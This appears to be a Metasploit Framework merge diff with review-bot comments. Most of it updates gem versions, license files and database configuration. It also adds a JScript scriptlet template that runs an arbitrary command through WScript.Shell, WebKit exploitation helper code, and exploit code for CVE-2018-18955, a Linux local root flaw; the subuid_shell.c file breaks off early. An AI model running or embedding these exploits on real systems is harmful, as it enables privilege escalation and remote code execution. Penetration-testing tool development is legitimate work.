sqlite3 (~> 1.3.0)
|
||||
swagger-blocks
|
||||
timecop
|
||||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.4
|
||||
1.17.3
|
||||
|
|
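Review bot: `BUNDLED WITH 1.17.3` records the bundler that wrote this lock; it only stays true on CI if the new `gem install bundler` step in .travis.yml pins to that series, otherwise a newer bundler on the build box will regenerate or reject this lockfile on the first run.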
6
LICENSE
6
LICENSE
|
@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
|
|||
Copyright: 2009 Vertive, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
|
||||
Copyright: 2006-2010 Yoann GUILLOT
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: lib/msf/core/modules/external/python/async_timeout/*
|
||||
Copyright: 2016-2017 Andrew Svetlov
|
||||
License: Apache 2.0
|
||||
|
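Review bot: dropping the `lib/metasm.rb lib/metasm/* data/cpuinfo/*` entry is consistent with metasm now arriving as a gem (Gemfile.lock resolves `metasm (1.0.3)` and LICENSE_GEMS lists `metasm, 1.0.3, LGPL`) and with the data/cpuinfo Makefile deletion at the end of this merge. Confirm that lib/metasm.rb and lib/metasm/ are really gone from the tree and that nothing else under data/cpuinfo remains, since this file is the only place their LGPL-2.1 terms were recorded.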
@ -115,7 +111,7 @@ Files: data/webcam/api.js
|
|||
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
|
||||
License: MIT
|
||||
|
||||
Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
|
||||
Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
|
||||
Copyright: Copyright 2018 SmartBear Software
|
||||
License: Apache 2.0
|
||||
|
||||
|
|
147
LICENSE_GEMS
147
LICENSE_GEMS
|
@ -1,135 +1,136 @@
|
|||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
Ascii85, 1.0.3, MIT
|
||||
actionpack, 4.2.10, MIT
|
||||
actionview, 4.2.10, MIT
|
||||
activemodel, 4.2.10, MIT
|
||||
activerecord, 4.2.10, MIT
|
||||
activesupport, 4.2.10, MIT
|
||||
actionpack, 4.2.11, MIT
|
||||
actionview, 4.2.11, MIT
|
||||
activemodel, 4.2.11, MIT
|
||||
activerecord, 4.2.11, MIT
|
||||
activesupport, 4.2.11, MIT
|
||||
addressable, 2.5.2, "Apache 2.0"
|
||||
afm, 0.2.2, MIT
|
||||
arel, 6.0.4, MIT
|
||||
arel-helpers, 2.6.1, MIT
|
||||
backports, 3.11.1, MIT
|
||||
bcrypt, 3.1.11, MIT
|
||||
arel-helpers, 2.8.0, MIT
|
||||
backports, 3.11.4, MIT
|
||||
bcrypt, 3.1.12, MIT
|
||||
bcrypt_pbkdf, 1.0.0, MIT
|
||||
bindata, 2.4.3, ruby
|
||||
bindata, 2.4.4, ruby
|
||||
bit-struct, 0.16, ruby
|
||||
builder, 3.2.3, MIT
|
||||
bundler, 1.16.1, MIT
|
||||
bundler, 1.17.3, MIT
|
||||
coderay, 1.1.2, MIT
|
||||
concurrent-ruby, 1.0.5, MIT
|
||||
crass, 1.0.3, MIT
|
||||
cookiejar, 0.3.3, unknown
|
||||
crass, 1.0.4, MIT
|
||||
daemons, 1.3.1, MIT
|
||||
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
|
||||
dnsruby, 1.60.2, "Apache 2.0"
|
||||
docile, 1.3.0, MIT
|
||||
dnsruby, 1.61.2, "Apache 2.0"
|
||||
docile, 1.3.1, MIT
|
||||
ed25519, 1.2.4, MIT
|
||||
em-http-request, 1.1.5, MIT
|
||||
em-socksify, 0.3.2, MIT
|
||||
erubis, 2.7.0, MIT
|
||||
factory_bot, 4.8.2, MIT
|
||||
factory_bot_rails, 4.8.2, MIT
|
||||
faker, 1.8.7, MIT
|
||||
faraday, 0.14.0, MIT
|
||||
filesize, 0.1.1, MIT
|
||||
fivemat, 1.3.6, MIT
|
||||
google-protobuf, 3.5.1, "New BSD"
|
||||
googleapis-common-protos-types, 1.0.1, "Apache 2.0"
|
||||
googleauth, 0.6.2, "Apache 2.0"
|
||||
grpc, 1.8.3, "Apache 2.0"
|
||||
eventmachine, 1.2.7, "ruby, GPL-2.0"
|
||||
factory_bot, 5.0.0, MIT
|
||||
factory_bot_rails, 5.0.0, MIT
|
||||
faker, 1.9.1, MIT
|
||||
faraday, 0.15.4, MIT
|
||||
filesize, 0.2.0, MIT
|
||||
fivemat, 1.3.7, MIT
|
||||
hashery, 2.1.2, "Simplified BSD"
|
||||
http_parser.rb, 0.6.0, MIT
|
||||
i18n, 0.9.5, MIT
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.1.0, ruby
|
||||
jwt, 2.1.0, MIT
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.2.2, MIT
|
||||
loofah, 2.2.0, MIT
|
||||
memoist, 0.16.0, MIT
|
||||
loofah, 2.2.3, MIT
|
||||
metasm, 1.0.3, LGPL
|
||||
metasploit-aggregator, 1.0.0, "New BSD"
|
||||
metasploit-concern, 2.0.5, "New BSD"
|
||||
metasploit-credential, 2.0.13, "New BSD"
|
||||
metasploit-framework, 5.0.0, "New BSD"
|
||||
metasploit-credential, 3.0.2, "New BSD"
|
||||
metasploit-framework, 5.0.5, "New BSD"
|
||||
metasploit-model, 2.0.4, "New BSD"
|
||||
metasploit-payloads, 1.3.31, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.16, "New BSD"
|
||||
metasploit_payloads-mettle, 0.3.7, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.9.0, MIT
|
||||
mini_portile2, 2.3.0, MIT
|
||||
metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 3.0.4, "New BSD"
|
||||
metasploit_payloads-mettle, 0.5.4, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.9.2, MIT
|
||||
mini_portile2, 2.4.0, MIT
|
||||
minitest, 5.11.3, MIT
|
||||
mqtt, 0.5.0, MIT
|
||||
msgpack, 1.2.4, "Apache 2.0"
|
||||
multi_json, 1.13.1, MIT
|
||||
msgpack, 1.2.6, "Apache 2.0"
|
||||
multipart-post, 2.0.0, MIT
|
||||
nessus_rest, 0.1.6, MIT
|
||||
net-ssh, 4.2.0, MIT
|
||||
net-ssh, 5.1.0, MIT
|
||||
network_interface, 0.0.2, MIT
|
||||
nexpose, 7.2.0, BSD
|
||||
nokogiri, 1.8.2, MIT
|
||||
octokit, 4.8.0, MIT
|
||||
openssl-ccm, 1.2.1, MIT
|
||||
nexpose, 7.2.1, "New BSD"
|
||||
nokogiri, 1.10.1, MIT
|
||||
octokit, 4.13.0, MIT
|
||||
openssl-ccm, 1.2.2, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
os, 0.9.6, MIT
|
||||
packetfu, 1.1.13, BSD
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.12.4, LGPL-2.1
|
||||
pdf-reader, 2.1.0, MIT
|
||||
pcaprub, 0.13.0, LGPL-2.1
|
||||
pdf-reader, 2.2.0, MIT
|
||||
pg, 0.20.0, "New BSD"
|
||||
pg_array_parser, 0.0.9, unknown
|
||||
postgres_ext, 3.0.0, MIT
|
||||
pry, 0.11.3, MIT
|
||||
public_suffix, 3.0.2, MIT
|
||||
rack, 1.6.9, MIT
|
||||
postgres_ext, 3.0.1, MIT
|
||||
pry, 0.12.2, MIT
|
||||
public_suffix, 3.0.3, MIT
|
||||
rack, 1.6.11, MIT
|
||||
rack-protection, 1.5.5, MIT
|
||||
rack-test, 0.6.3, MIT
|
||||
rails-deprecated_sanitizer, 1.0.3, MIT
|
||||
rails-dom-testing, 1.0.9, MIT
|
||||
rails-html-sanitizer, 1.0.3, MIT
|
||||
railties, 4.2.10, MIT
|
||||
rake, 12.3.0, MIT
|
||||
rails-html-sanitizer, 1.0.4, MIT
|
||||
railties, 4.2.11, MIT
|
||||
rake, 12.3.2, MIT
|
||||
rb-readline, 0.5.5, BSD
|
||||
recog, 2.1.18, unknown
|
||||
recog, 2.1.45, unknown
|
||||
redcarpet, 3.4.0, MIT
|
||||
rex-arch, 0.1.13, "New BSD"
|
||||
rex-bin_tools, 0.1.4, "New BSD"
|
||||
rex-bin_tools, 0.1.6, "New BSD"
|
||||
rex-core, 0.1.13, "New BSD"
|
||||
rex-encoder, 0.1.4, "New BSD"
|
||||
rex-exploitation, 0.1.17, "New BSD"
|
||||
rex-exploitation, 0.1.20, "New BSD"
|
||||
rex-java, 0.1.5, "New BSD"
|
||||
rex-mime, 0.1.5, "New BSD"
|
||||
rex-nop, 0.1.1, "New BSD"
|
||||
rex-ole, 0.1.6, "New BSD"
|
||||
rex-powershell, 0.1.77, "New BSD"
|
||||
rex-powershell, 0.1.79, "New BSD"
|
||||
rex-random_identifier, 0.1.4, "New BSD"
|
||||
rex-registry, 0.1.3, "New BSD"
|
||||
rex-rop_builder, 0.1.3, "New BSD"
|
||||
rex-socket, 0.1.10, "New BSD"
|
||||
rex-socket, 0.1.15, "New BSD"
|
||||
rex-sslscan, 0.1.5, "New BSD"
|
||||
rex-struct2, 0.1.2, "New BSD"
|
||||
rex-text, 0.2.17, "New BSD"
|
||||
rex-text, 0.2.21, "New BSD"
|
||||
rex-zip, 0.1.3, "New BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
rspec, 3.7.0, MIT
|
||||
rspec-core, 3.7.1, MIT
|
||||
rspec-expectations, 3.7.0, MIT
|
||||
rspec-mocks, 3.7.0, MIT
|
||||
rspec-rails, 3.7.2, MIT
|
||||
rspec, 3.8.0, MIT
|
||||
rspec-core, 3.8.0, MIT
|
||||
rspec-expectations, 3.8.2, MIT
|
||||
rspec-mocks, 3.8.0, MIT
|
||||
rspec-rails, 3.8.2, MIT
|
||||
rspec-rerun, 1.1.0, MIT
|
||||
rspec-support, 3.7.1, MIT
|
||||
ruby-macho, 1.1.0, MIT
|
||||
rspec-support, 3.8.0, MIT
|
||||
ruby-macho, 2.1.0, MIT
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby_smb, 0.0.23, "New BSD"
|
||||
ruby_smb, 1.0.5, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 1.2.1, "Simplified BSD"
|
||||
rubyzip, 1.2.2, "Simplified BSD"
|
||||
sawyer, 0.8.1, MIT
|
||||
signet, 0.8.1, "Apache 2.0"
|
||||
simplecov, 0.16.0, MIT
|
||||
simplecov, 0.16.1, MIT
|
||||
simplecov-html, 0.10.2, MIT
|
||||
sinatra, 1.4.8, MIT
|
||||
sqlite3, 1.3.13, "New BSD"
|
||||
sshkey, 1.9.0, MIT
|
||||
thor, 0.20.0, MIT
|
||||
swagger-blocks, 2.0.2, MIT
|
||||
thin, 1.7.2, "GPLv2+, Ruby 1.8"
|
||||
thor, 0.20.3, MIT
|
||||
thread_safe, 0.3.6, "Apache 2.0"
|
||||
tilt, 2.0.9, MIT
|
||||
timecop, 0.9.1, MIT
|
||||
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||
tzinfo, 1.2.5, MIT
|
||||
tzinfo-data, 1.2018.3, MIT
|
||||
tzinfo-data, 1.2018.9, MIT
|
||||
warden, 1.2.7, MIT
|
||||
windows_error, 0.1.2, BSD
|
||||
xdr, 2.0.0, "Apache 2.0"
|
||||
xmlrpc, 0.3.0, ruby
|
||||
yard, 0.9.12, MIT
|
||||
yard, 0.9.18, MIT
|
||||
|
|
|
@ -14,7 +14,7 @@ development: &pgsql
|
|||
adapter: postgresql
|
||||
database: metasploit_framework_development
|
||||
username: postgres
|
||||
pool: 5
|
||||
pool: 25
|
||||
timeout: 5
|
||||
|
||||
# Warning: The database defined as "test" will be erased and
|
||||
|
|
|
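Review bot: the jump from `pool: 5` to `pool: 25` in the development block carries no explanation; a pool only caps how many connections a single process may check out, so 25 is harmless on its own, but several framework processes sharing one PostgreSQL server whose `max_connections` is still the default 100 will start to collide. Please add a one-line comment above `pool: 25` stating why the larger value is needed, so the next person does not quietly lower it again.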
@ -1,11 +0,0 @@
|
|||
#!/bin/sh
|
||||
|
||||
gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
|
||||
strip cpuinfo.ia32.bin && \
|
||||
gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
|
||||
strip cpuinfo.ia64.bin && \
|
||||
i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
|
||||
strip cpuinfo.exe
|
||||
|
||||
ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
|
||||
|
|
@ -1,64 +0,0 @@
|
|||
// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
|
||||
|
||||
/*
|
||||
#!/usr/bin/env ruby
|
||||
# This file is part of Metasm, the Ruby assembly manipulation suite
|
||||
# Copyright (C) 2006-2009 Yoann GUILLOT
|
||||
#
|
||||
# Licence is LGPL, see LICENCE in the top-level directory
|
||||
|
||||
|
||||
#
|
||||
# this sample shows the compilation of a slightly more complex program
|
||||
# it displays in a messagebox the result of CPUID
|
||||
#
|
||||
|
||||
*/
|
||||
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
|
||||
static char *featureinfo[32] = {
|
||||
"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
|
||||
"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
|
||||
"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
|
||||
"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
|
||||
}, *extendinfo[32] = {
|
||||
"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
|
||||
"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
|
||||
"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
|
||||
"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
|
||||
};
|
||||
|
||||
#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
|
||||
#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
|
||||
int main(void)
|
||||
{
|
||||
|
||||
unsigned long eax, ebx, ecx, edx;
|
||||
unsigned long i;
|
||||
|
||||
cpuid(0);
|
||||
fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
|
||||
|
||||
cpuid(1);
|
||||
fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
|
||||
b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
|
||||
fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
|
||||
b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
|
||||
|
||||
fprintf(stdout, "FLAGS:");
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (edx & (1 << i))
|
||||
fprintf(stdout, " %s", featureinfo[i]);
|
||||
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (ecx & (1 << i))
|
||||
fprintf(stdout, " %s", extendinfo[i]);
|
||||
|
||||
fprintf(stdout, "\n");
|
||||
fflush(stdout);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
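Review bot: removing `cpuinfo.c` together with its build script is fine, but nothing in the commit says what replaces the prebuilt `cpuinfo.*.bin` / `cpuinfo.exe` helpers that the script produced; if the binaries are dropped in the same change, a note in the commit message (or the module that used them) should say where the functionality now lives.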
|
@ -0,0 +1,16 @@
|
|||
<?xml version='1.0'?>
|
||||
<package>
|
||||
<component id='giffile'>
|
||||
<registration
|
||||
description='Dummy'
|
||||
progid='giffile'
|
||||
version='1.00'
|
||||
remotable='True'>
|
||||
</registration>
|
||||
<script language='JScript'>
|
||||
<![CDATA[
|
||||
var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
|
||||
]]>
|
||||
</script>
|
||||
</component>
|
||||
</package>
|
|
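Review bot: `SCRIPTED_COMMAND` is substituted into a double-quoted JScript string literal (`Run("SCRIPTED_COMMAND")`), so whatever code performs the substitution must escape backslashes and double quotes in the command, otherwise a command containing either one breaks the scriptlet; a comment at the top of the template stating that contract would help, since the template itself cannot enforce it.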
@ -0,0 +1,182 @@
|
|||
//
|
||||
// Tiny module that provides big (64bit) integers.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
// Requires utils.js
|
||||
//
|
||||
|
||||
// Datatype to represent 64-bit integers.
|
||||
//
|
||||
// Internally, the integer is stored as a Uint8Array in little endian byte order.
|
||||
function Int64(v) {
|
||||
// The underlying byte array.
|
||||
var bytes = new Uint8Array(8);
|
||||
|
||||
switch (typeof v) {
|
||||
case 'number':
|
||||
v = '0x' + Math.floor(v).toString(16);
|
||||
case 'string':
|
||||
if (v.startsWith('0x'))
|
||||
v = v.substr(2);
|
||||
if (v.length % 2 == 1)
|
||||
v = '0' + v;
|
||||
|
||||
var bigEndian = unhexlify(v, 8);
|
||||
bytes.set(Array.from(bigEndian).reverse());
|
||||
break;
|
||||
case 'object':
|
||||
if (v instanceof Int64) {
|
||||
bytes.set(v.bytes());
|
||||
} else {
|
||||
if (v.length != 8)
|
||||
throw TypeError("Array must have excactly 8 elements.");
|
||||
bytes.set(v);
|
||||
}
|
||||
break;
|
||||
case 'undefined':
|
||||
break;
|
||||
default:
|
||||
throw TypeError("Int64 constructor requires an argument.");
|
||||
}
|
||||
|
||||
// Return a double whith the same underlying bit representation.
|
||||
this.asDouble = function() {
|
||||
// Check for NaN
|
||||
if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
|
||||
throw new RangeError("Integer can not be represented by a double");
|
||||
|
||||
return Struct.unpack(Struct.float64, bytes);
|
||||
};
|
||||
|
||||
// Return a javascript value with the same underlying bit representation.
|
||||
// This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
|
||||
// due to double conversion constraints.
|
||||
this.asJSValue = function() {
|
||||
if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
|
||||
throw new RangeError("Integer can not be represented by a JSValue");
|
||||
|
||||
// For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
|
||||
this.assignSub(this, 0x1000000000000);
|
||||
var res = Struct.unpack(Struct.float64, bytes);
|
||||
this.assignAdd(this, 0x1000000000000);
|
||||
|
||||
return res;
|
||||
};
|
||||
|
||||
// Return the underlying bytes of this number as array.
|
||||
this.bytes = function() {
|
||||
return Array.from(bytes);
|
||||
};
|
||||
|
||||
// Return the byte at the given index.
|
||||
this.byteAt = function(i) {
|
||||
return bytes[i];
|
||||
};
|
||||
|
||||
// Return the value of this number as unsigned hex string.
|
||||
this.toString = function() {
|
||||
return '0x' + hexlify(Array.from(bytes).reverse());
|
||||
};
|
||||
|
||||
// Basic arithmetic.
|
||||
// These functions assign the result of the computation to their 'this' object.
|
||||
|
||||
// Decorator for Int64 instance operations. Takes care
|
||||
// of converting arguments to Int64 instances if required.
|
||||
function operation(f, nargs) {
|
||||
return function() {
|
||||
if (arguments.length != nargs)
|
||||
throw Error("Not enough arguments for function " + f.name);
|
||||
for (var i = 0; i < arguments.length; i++)
|
||||
if (!(arguments[i] instanceof Int64))
|
||||
arguments[i] = new Int64(arguments[i]);
|
||||
return f.apply(this, arguments);
|
||||
};
|
||||
}
|
||||
|
||||
// this = -n (two's complement)
|
||||
this.assignNeg = operation(function neg(n) {
|
||||
for (var i = 0; i < 8; i++)
|
||||
bytes[i] = ~n.byteAt(i);
|
||||
|
||||
return this.assignAdd(this, Int64.One);
|
||||
}, 1);
|
||||
|
||||
// this = a + b
|
||||
this.assignAdd = operation(function add(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) + b.byteAt(i) + carry;
|
||||
carry = cur > 0xff | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a - b
|
||||
this.assignSub = operation(function sub(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) - b.byteAt(i) - carry;
|
||||
carry = cur < 0 | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a ^ b
|
||||
this.assignXor = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) ^ b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a & b
|
||||
this.assignAnd = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) & b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2)
|
||||
}
|
||||
|
||||
// Constructs a new Int64 instance with the same bit representation as the provided double.
|
||||
Int64.fromDouble = function(d) {
|
||||
var bytes = Struct.pack(Struct.float64, d);
|
||||
return new Int64(bytes);
|
||||
};
|
||||
|
||||
// Convenience functions. These allocate a new Int64 to hold the result.
|
||||
|
||||
// Return -n (two's complement)
|
||||
function Neg(n) {
|
||||
return (new Int64()).assignNeg(n);
|
||||
}
|
||||
|
||||
// Return a + b
|
||||
function Add(a, b) {
|
||||
return (new Int64()).assignAdd(a, b);
|
||||
}
|
||||
|
||||
// Return a - b
|
||||
function Sub(a, b) {
|
||||
return (new Int64()).assignSub(a, b);
|
||||
}
|
||||
|
||||
// Return a ^ b
|
||||
function Xor(a, b) {
|
||||
return (new Int64()).assignXor(a, b);
|
||||
}
|
||||
|
||||
// Return a & b
|
||||
function And(a, b) {
|
||||
return (new Int64()).assignAnd(a, b);
|
||||
}
|
||||
|
||||
// Some commonly used numbers.
|
||||
Int64.Zero = new Int64(0);
|
||||
Int64.One = new Int64(1);
|
||||
|
||||
// That's all the arithmetic we need for exploiting WebKit.. :)
|
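Review bot: `assignXor` and `assignAnd` both name their inner function `sub` (copy-pasted from `assignSub`), so the `"Not enough arguments for function " + f.name` error raised in `operation` would misreport which operation failed; rename them `xor` and `and`. Two smaller points in the same file: the `case 'number':` branch intentionally falls through into `case 'string':` and deserves a `// fallthrough` comment, and the `operation` wrapper throws "Not enough arguments" on `arguments.length != nargs`, which also fires when too many arguments are passed.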
|
@ -0,0 +1,78 @@
|
|||
//
|
||||
// Utility functions.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
|
||||
// Return the hexadecimal representation of the given byte.
|
||||
function hex(b) {
|
||||
return ('0' + b.toString(16)).substr(-2);
|
||||
}
|
||||
|
||||
// Return the hexadecimal representation of the given byte array.
|
||||
function hexlify(bytes) {
|
||||
var res = [];
|
||||
for (var i = 0; i < bytes.length; i++)
|
||||
res.push(hex(bytes[i]));
|
||||
|
||||
return res.join('');
|
||||
}
|
||||
|
||||
// Return the binary data represented by the given hexdecimal string.
|
||||
function unhexlify(hexstr) {
|
||||
if (hexstr.length % 2 == 1)
|
||||
throw new TypeError("Invalid hex string");
|
||||
|
||||
var bytes = new Uint8Array(hexstr.length / 2);
|
||||
for (var i = 0; i < hexstr.length; i += 2)
|
||||
bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
|
||||
|
||||
return bytes;
|
||||
}
|
||||
|
||||
function hexdump(data) {
|
||||
if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
|
||||
data = Array.from(data);
|
||||
|
||||
var lines = [];
|
||||
for (var i = 0; i < data.length; i += 16) {
|
||||
var chunk = data.slice(i, i+16);
|
||||
var parts = chunk.map(hex);
|
||||
if (parts.length > 8)
|
||||
parts.splice(8, 0, ' ');
|
||||
lines.push(parts.join(' '));
|
||||
}
|
||||
|
||||
return lines.join('\n');
|
||||
}
|
||||
|
||||
// Simplified version of the similarly named python module.
|
||||
var Struct = (function() {
|
||||
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
|
||||
var buffer = new ArrayBuffer(8);
|
||||
var byteView = new Uint8Array(buffer);
|
||||
var uint32View = new Uint32Array(buffer);
|
||||
var float64View = new Float64Array(buffer);
|
||||
|
||||
return {
|
||||
pack: function(type, value) {
|
||||
var view = type; // See below
|
||||
view[0] = value;
|
||||
return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
|
||||
},
|
||||
|
||||
unpack: function(type, bytes) {
|
||||
if (bytes.length !== type.BYTES_PER_ELEMENT)
|
||||
throw Error("Invalid bytearray");
|
||||
|
||||
var view = type; // See below
|
||||
byteView.set(bytes);
|
||||
return view[0];
|
||||
},
|
||||
|
||||
// Available types.
|
||||
int8: byteView,
|
||||
int32: uint32View,
|
||||
float64: float64View
|
||||
};
|
||||
})();
|
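Review bot: `Struct.pack` returns `new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT)`, a view onto the shared scratch `buffer`, so the returned bytes are silently overwritten by the next `pack` or `unpack` call; `Int64.fromDouble` happens to copy the result straight away via `bytes.set`, but any caller that keeps the value around will read stale data. Returning a copy (`new Uint8Array(buffer.slice(0, type.BYTES_PER_ELEMENT))`) makes the helper safe to hold. Also, the type exported as `int32` is backed by `uint32View` and therefore unpacks as unsigned; the name should say so.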
|
@ -0,0 +1,52 @@
|
|||
// subshell.c
|
||||
// author: Jann Horn
|
||||
// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <grp.h>
|
||||
#include <err.h>
|
||||
#include <stdio.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
int main() {
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
|
||||
|
||||
pid_t child = fork();
|
||||
if (child == -1) err(1, "fork");
|
||||
if (child == 0) {
|
||||
close(sync_pipe[1]);
|
||||
if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
|
||||
if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
|
||||
execl("/bin/bash", "bash", NULL);
|
||||
err(1, "exec");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
|
||||
char pbuf[100];
|
||||
sprintf(pbuf, "/proc/%d", (int)child);
|
||||
if (chdir(pbuf)) err(1, "chdir");
|
||||
const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
|
||||
int uid_map = open("uid_map", O_WRONLY);
|
||||
if (uid_map == -1) err(1, "open uid map");
|
||||
if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
|
||||
close(uid_map);
|
||||
int gid_map = open("gid_map", O_WRONLY);
|
||||
if (gid_map == -1) err(1, "open gid map");
|
||||
if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
|
||||
close(gid_map);
|
||||
if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) err(1, "wait");
|
||||
return 0;
|
||||
}
|
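Review bot: `strlen` is used in the `uid_map` and `gid_map` writes but `<string.h>` is not among the includes, so this compiles only through an implicit declaration, which is a warning under C99 and a hard error on compilers that now reject implicit declarations by default (GCC 14 does); add `#include <string.h>`. The `write(...) != strlen(...)` comparisons also mix `ssize_t` and `size_t`; computing the length once into a `size_t` and casting the `write` result avoids the sign-compare warning.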
|
@ -0,0 +1,272 @@
|
|||
// subuid_shell.c - Linux local root exploit for CVE-2018-18955
|
||||
// Exploits broken uid/gid mapping in nested user namespaces.
|
||||
// ---
|
||||
// Mostly stolen from Jann Horn's exploit:
|
||||
// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
// Some code stolen from Xairy's exploits:
|
||||
// - https://github.com/xairy/kernel-exploits
|
||||
// ---
|
||||
// <bcoles@gmail.com>
|
||||
// - added auto subordinate id mapping
|
||||
// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
|
||||
|
||||
#define _GNU_SOURCE
|
||||
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <grp.h>
|
||||
#include <pwd.h>
|
||||
#include <sched.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sys/wait.h>
|
||||
#include <stdarg.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <sys/prctl.h>
|
||||
|
||||
#define DEBUG
|
||||
|
||||
#ifdef DEBUG
|
||||
# define dprintf printf
|
||||
#else
|
||||
# define dprintf
|
||||
#endif
|
||||
|
||||
char* SUBSHELL = "./subshell";
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
|
||||
|
||||
#define CHUNK_SIZE 1024
|
||||
|
||||
int read_file(const char* file, char* buffer, int max_length) {
|
||||
int f = open(file, O_RDONLY);
|
||||
if (f == -1)
|
||||
return -1;
|
||||
